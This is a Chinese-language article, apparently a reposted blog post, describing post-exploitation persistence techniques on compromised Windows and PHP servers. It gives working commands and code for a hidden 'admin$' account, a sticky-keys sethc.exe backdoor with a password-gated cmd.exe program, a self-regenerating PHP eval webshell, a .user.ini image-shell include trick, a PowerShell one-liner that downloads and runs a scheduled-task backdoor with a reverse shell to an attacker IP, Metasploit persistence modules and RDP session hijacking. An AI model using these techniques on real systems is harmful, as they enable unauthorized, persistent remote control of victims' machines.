后渗透权限维持的方法

  • 时间:
  • 来源:互联网
  • 文章标签:

一、影子账户

net user admin$ admin /add

具体可以通过注册表查找
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names
在默认情况下,隐藏用户的查看是隐藏的。

解决方法:在SAM文件夹处点击右键—>权限(设置就好了)


二、shift后门
1、先删除缓存C:\WINDOWS\system32\dllcache\sethc.exe
2、C:\WINDOWS\system32\cmd.exe 将其复制并将名称更改为 sethc.exe
代码:

#include<cstdio>
#include<cstring>
#include<cstdlib>
#include<conio.h>
int main(void)
{
    char welcome[1700] = " \n\
    Please input your password! \n\
    password : ";
    while(1){
        char password[30];
        char pwd[30] = "adexx!@#QWE";
        printf("%s",welcome);
        puts("");
        printf("你输入的密码:");
        scanf("%s",password);
        if(strncmp(password,pwd,11) == 0){
            system("cmd.exe");
        }else{
            printf("%s","Error\n");
            fflush(stdin);
        }
    }
    return 0;
}

注. 这里种shift后门目标是2008的机器的话 那么可以用2003的远程连接工具进行连接


三、不死马(web层面的权限维持)

1、事先隐藏后门文件操作:右键-》属性-》隐藏

2、将木马名字进行伪装处理,伪装成系统文件或者报错文件。修改时间跟系统文件时间类似。

3、利用循环不死马(举栗子)

<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
	file_put_contents('phpinf0.php','<?php $a=array($_REQUEST["kk"]=>"3");
	$b=array_keys($a)[0];
	eval($b);?>');
	sleep(8);
}
?>

说明:此脚本会每8秒不断的向服务器生成一个“phpinf0.php”的一句话木马.


四:利用.user.ini文件自动包含木马文件

利用成功前提下必须有以下三个文件,
1、PHP的正常文件
2、修改后.user.ini文件
3、luomiweixiong.gif木马

创建一个文件夹test
1、test.php 内容为 <?php echo 1;?>

2、luomiweixiong.gif 内容为<?php if(@$_GET['shell']=='test'){phpinfo();}?>

3、在“.user.ini”文件写入: auto_prepend_file=luomiweixiong.gif

浏览器访问:http://127.0.0.1/test/test.php?shell=test
则出现的为phpinfo()函数执行的效果

原理:
https://www.php.net/manual/zh/configuration.file.per-user.php

在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别

这里就很清楚了,.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。(上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置)

实际上 这里面没有说完整,其实除了PHP_INI_SYSTEM以外的模式(包括PHP_INI_ALL)都是可以通过.user.ini来设置的。

其中有个配置项auto_prepend_file就可以被利用导致后门的生成

auto_prepend_file:指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中

隐藏知识:某网站限制不允许上传.php文件,你便可以上传一个.user.ini,再上传一个图片马,包含起来进行getshell。不过前提是含有.user.ini的文件夹下需要有正常的php文件,否则也不能包含了。 再比如,你只是想隐藏个后门,这个方式是最方便的。


五、Powershell权限维持
参考此PowerShell脚本
https://github.com/re4lity/Schtasks-Backdoor

执行代码:powershell.exe-exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.124.25/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor-method nccat -ip 192.168.124.14 -port 666 -time 2"

说明:
1、192.168.124.25为受害者IP,前提是要把PowerShell脚本放到受害者服务器能访问到的根路径。
2、192.168.124.14为接收反弹回来的IP,可用NC监听反弹回来的shell


六、metasploit权限维持(老生常谈直接操作就好了哈)

1、Persistence模块
前提是利用MSF获取到了对方的会话
run persistence -U -i 12 -p 6666 -r 192.168.124.14

说明
-i 目标自动回连时间
-p 设置目标反向连接的端口
-r 设置目标反向连接的ip地址
-U 设置目标自启动
加入自启动后,就算受害者机器再次启动也能弹回shell

2、metsvc 模块
前提是利用MSF获取到了对方的会话
run metsvc -A

说明:

-A 自动启动一个匹配的 multi/handler 以连接到该服务
该模块是在受害者服务器开启了一个“Meterpreter”服务
下次攻击者可以利用metsvc_bind_tcp监听模块就可以再次获取到shell
监听端口为31337


七、会话劫持

说明:RDP会话劫持是在不知道另一用户密码的条件下进行切换用户登录

query user
sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"
net start sesshijack

tscon 参数为query user命令中的所要劫持ID参数
dest: 为你当前用户的会话名

本文链接http://www.taodudu.cc/news/show-647770.html